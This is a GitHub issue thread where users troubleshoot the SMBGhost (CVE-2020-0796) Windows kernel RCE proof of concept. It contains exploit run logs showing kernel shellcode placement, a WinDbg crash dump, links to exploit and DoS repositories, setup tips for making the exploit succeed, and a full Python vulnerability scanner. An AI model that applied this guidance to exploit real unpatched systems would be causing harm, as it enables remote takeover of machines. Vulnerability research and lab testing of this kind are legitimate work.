SMBGhost_RCE_PoC
SMBGhost_RCE_PoC copied to clipboard
chompie1337
physical read primitive failed
physical read primitive failed for my host which is vulnerable as it shows this scanner https://github.com/ollypwn/SMBGhost is this normal?
I haven't been able to replicate this behavior. Can you check to see if this DoS script causes BSOD? Thank you
https://github.com/eerykitty/CVE-2020-0796-PoC
I tried on 1809, 1903, 1909, 2004, all got same error, DoS script does cause BSOD
I tried on 1809, 1903, 1909, 2004, all got same error, DoS script does cause BSOD
what is your testing enviorment? meaning, what hypervisor. it seems like the read primitive is not working, it could be that tcpip is not using DMA which the primitive depends on
I tried on 1809, 1903, 1909, 2004, all got same error, DoS script does cause BSOD
what is your testing enviorment? meaning, what hypervisor. it seems like the read primitive is not working, it could be that tcpip is not using DMA which the primitive depends on
I use Hyper-V on Windows
Found some related pictures.
Same problem, virtualbox+win10 1903 business+python3.7+closed WAF+closed security center //not patch, blue screen with python2 by exploit.py, and https://github.com/eerykitty/CVE-2020-0796-PoC
I am having the same error. I tried on a VMWARE Fusion VM running windows and a physical desktop running windows. I tried the physical host to see if it had to do with DMA but neither worked.
I tried the above DoS script and it doesent even blue screen either VM or physical desktop. I feel like I may be missing something
I used this to confirm they are both vulnerable but I don't know how reliable it is https://github.com/ollypwn/SMBGhost
It fails around if buff[4:8] != b"\xfeSMB":
buff[4:8] always equals b"\xfeSMB" and I'm unsure what it should equal to get the expected output
Edit: what was your lab setup when developing this? Im going to try virtualbox instead of VMWare fusion because ive seen another user have success with that hypervisor
ive
Hello! I‘m having the same problem with you. Have you succeeded?
Not yet, i think the physical system im using for testing has a patch for the issue or the version is not vulnerable. Im really not sure tho
@99hansling I Have solved the problem of the read primitive failing! I got it working on a VM running in VMWare fusion, I just had to download an older version of windows 10.
I downloaded version 1903 form here: https://tb.rg-adguard.net/public.php (the files are downloaded from Microsoft servers so its not sketchy)
Installed in a VM with no internet to make sure no automatic updates happened (idk if this was required but im new to windows internals so I was just bein safe). The exploit worked first try with no issue it seems like, adding my own shellcode now to verify.
Thanks @chompie1337 for an awesome POC and instructions for adding your own shellcode!
@Fi1o
@99hansling I Have solved the problem of the read primitive failing! I got it working on a VM running in VMWare fusion, I just had to download an older version of windows 10.
I downloaded version 1903 form here: https://tb.rg-adguard.net/public.php (the files are downloaded from Microsoft servers so its not sketchy)
Installed in a VM with no internet to make sure no automatic updates happened (idk if this was required but im new to windows internals so I was just bein safe). The exploit worked first try with no issue it seems like, adding my own shellcode now to verify.
Thanks @chompie1337 for an awesome POC and instructions for adding your own shellcode!
Was this with Windows 10 Home or Pro version of 1903? This is also known as 18362, correct? Thanks!
Same on a remote Windows 10 Pro 18362. EDIT: i tested it on a physical local windows 10 and it worked.
I tried on 1809, 1903, 1909, 2004, all got same error, DoS script does cause BSOD
what is your testing enviorment? meaning, what hypervisor. it seems like the read primitive is not working, it could be that tcpip is not using DMA which the primitive depends on
hello! i tested on windows 10 1903 vm, it works as follow result. [+] found low stub at phys addr 11000! [+] PML4 at 1aa000 [+] base of HAL heap at fffff788c0000000 [+] found PML4 self-ref entry 1e7 [+] found HalpInterruptController at fffff788c0000680 [+] found HalpApicRequestInterrupt at fffff80035eb3bb0 [+] built shellcode! [+] KUSER_SHARED_DATA PTE at fffff3fbc0000000 [+] KUSER_SHARED_DATA PTE NX bit cleared! [+] Wrote shellcode at fffff78000000950! [+] Press a key to execute shellcode! [+] overwrote HalpInterruptController pointer, should have execution shortly...
but bluescreen was trigged.i i debuged by using windbg.
hal!HalpApicRequestInterrupt+0xa4: fffff800`35eb3c54 4584e4 test r12b,r12b 3: kd> t KDTARGET: Refreshing KD connection
A fatal system error has occurred. Debugger entered on first try; Bugcheck callbacks have not been invoked.
A fatal system error has occurred.
For analysis of this file, run !analyze -v nt!DbgBreakPointWithStatus: fffff800`355c4580 cc int 3 0: kd> !analyze -v The debuggee is ready to run WARNING: This break is not a step/trace completion. The last command has been cleared to prevent accidental continuation of this unrelated event. Check the event, location and thread before resuming. Break instruction exception - code 80000003 (first chance)
A fatal system error has occurred. Debugger entered on first try; Bugcheck callbacks have not been invoked.
A fatal system error has occurred.
0: kd> r rax=0000000000000000 rbx=0000000000000003 rcx=0000000000000003 rdx=0000000000000000 rsi=0000000000000000 rdi=fffff80031a5b180 rip=fffff800355c4580 rsp=fffff800386813b8 rbp=fffff80038681520 r8=0000000000000000 r9=0000000000000000 r10=000001539738d27d r11=fffff80038681370 r12=0000000000000003 r13=00000000004f4454 r14=0000000000000000 r15=ffffbf0ce8ca8040 iopl=0 nv up di ng nz na po nc cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000086
Windows10 1903 18362.30 The virtual machine USES VMWARE Wotkstation 14
root@bogon:~/Desktop/SMBGhost_RCE_PoC-master# python3 exploit.py -ip 192.168.83.130 [-] physical read primitive failed!
Who can tell me how to set it up to be successful. thanks
Windows10 1903 18362.30 The virtual machine USES VMWARE Wotkstation 14
root@bogon:~/Desktop/SMBGhost_RCE_PoC-master# python3 exploit.py -ip 192.168.83.130 [-] physical read primitive failed!
Who can tell me how to set it up to be successful. thanks
@wxh0000mm are you sure you can reach the windows 10 machine ? try: ping 192.168.83.130 if there is a respond try using https://github.com/ollypwn/SMBGhost with: python3 scanner.py 192.168.83.130 then post the result
What i noted when testing, was that using python3 caused this error "physical read primitive failed" but using python2 triggered the bsod. Haven't looked into why yet, but try python2 if you are getting this error.
Windows10 1903 18362.356
C:\Users\Ransel\Desktop> python3 exploit.py -ip 192.168.83.130 [-] physical read primitive failed!
try othor version of python!I failed to use Python 3.9, but Python 3.10 succeeded!
Windows10 1903 18362.30 The virtual machine USES VMWARE Wotkstation 14 root@bogon:~/Desktop/SMBGhost_RCE_PoC-master# python3 exploit.py -ip 192.168.83.130 [-] physical read primitive failed! Who can tell me how to set it up to be successful. thanks
@wxh0000mm are you sure you can reach the windows 10 machine ? try:
ping 192.168.83.130if there is a respond try using https://github.com/ollypwn/SMBGhost with:python3 scanner.py 192.168.83.130then post the result
import socket import struct import sys
def scanner_smb_ghost_silent(ip,port): header = b"\xfeSMB" # magic header += struct.pack("H", 64) # header size header += struct.pack("H", 0) # credit charge header += struct.pack("H", 0) # channel sequence header += struct.pack("H", 0) # reserved header += struct.pack("H", 0) # negotiate protocol command header += struct.pack("H", 31) # credits requested header += struct.pack("I", 0) # flags header += struct.pack("I", 0) # chain offset header += struct.pack("Q", 0) # message id header += struct.pack("I", 0) # process id header += struct.pack("I", 0) # tree id header += struct.pack("Q", 0) # session id header += struct.pack("QQ", (0 >> 64) & 0xffffffffffffffff, 0 & 0xffffffffffffffff) # signature
negotiation = b""
negotiation += struct.pack("H", 0x24) # struct size
negotiation += struct.pack("H", 8) # amount of dialects
negotiation += struct.pack("H", 1) # enable signing
negotiation += struct.pack("H", 0) # reserved
negotiation += struct.pack("I", 0x7f) # capabilities
negotiation += struct.pack("QQ", (0 >> 64) & 0xffffffffffffffff, 0 & 0xffffffffffffffff) # client guid
negotiation += struct.pack("I", 0x78) # negotiation offset
negotiation += struct.pack("H", 2) # negotiation context count
negotiation += struct.pack("H", 0) # reserved
negotiation += struct.pack("H", 0x0202) # smb 2.0.2 dialect
negotiation += struct.pack("H", 0x0210) # smb 2.1.0 dialect
negotiation += struct.pack("H", 0x0222) # smb 2.2.2 dialect
negotiation += struct.pack("H", 0x0224) # smb 2.2.4 dialect
negotiation += struct.pack("H", 0x0300) # smb 3.0.0 dialect
negotiation += struct.pack("H", 0x0302) # smb 3.0.2 dialect
negotiation += struct.pack("H", 0x0310) # smb 3.1.0 dialect
negotiation += struct.pack("H", 0x0311) # smb 3.1.1 dialect
negotiation += struct.pack("I", 0) # padding
negotiation += struct.pack("H", 1) # negotiation context type
negotiation += struct.pack("H", 38) # negotiation data length
negotiation += struct.pack("I", 0) # reserved
negotiation += struct.pack("H", 1) # negotiation hash algorithm count
negotiation += struct.pack("H", 32) # negotiation salt length
negotiation += struct.pack("H", 1) # negotiation hash algorithm SHA512
negotiation += struct.pack("H", 1) # negotiation hash algorithm SHA512
negotiation += struct.pack("QQ", (0 >> 64) & 0xffffffffffffffff, 0 & 0xffffffffffffffff) # salt part 1
negotiation += struct.pack("QQ", (0 >> 64) & 0xffffffffffffffff, 0 & 0xffffffffffffffff) # salt part 2
negotiation += struct.pack("H", 3) # unknown??
negotiation += struct.pack("H", 10) # data length unknown??
negotiation += struct.pack("I", 0) # reserved unknown??
negotiation += b"\x01\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00" # unknown??
packet = header + negotiation
netbios = b""
netbios += struct.pack("H", 0) # NetBIOS sessions message (should be 1 byte but whatever)
netbios += struct.pack("B", 0) # just a pad to make it 3 bytes
netbios += struct.pack("B", len(packet)) # NetBIOS length (should be 3 bytes but whatever, as long as the packet isn't 0xff+ bytes)
packet = netbios + packet
io = socket.socket(socket.AF_INET)
io.connect((str(ip), int(port)))
io.send(packet)
size = struct.unpack("I", io.recv(4))[0]
response = io.recv(size)
version = struct.unpack("H", response[68:70])[0]
context = struct.unpack("H", response[70:72])[0]
if version != 0x0311:
print(f"SMB version {hex(version)} was found which is not vulnerable!")
return False
elif context != 2:
print(
f"Server answered with context {hex(context)} which indicates that the target may not have SMB compression enabled and is therefore not vulnerable!")
return False
else:
print(
f"SMB version {hex(version)} with context {hex(context)} was found which indicates SMBv3.1.1 is being used and SMB compression is enabled, therefore being vulnerable to CVE-2020-0796!")
return True
hi guys! can anyone help?
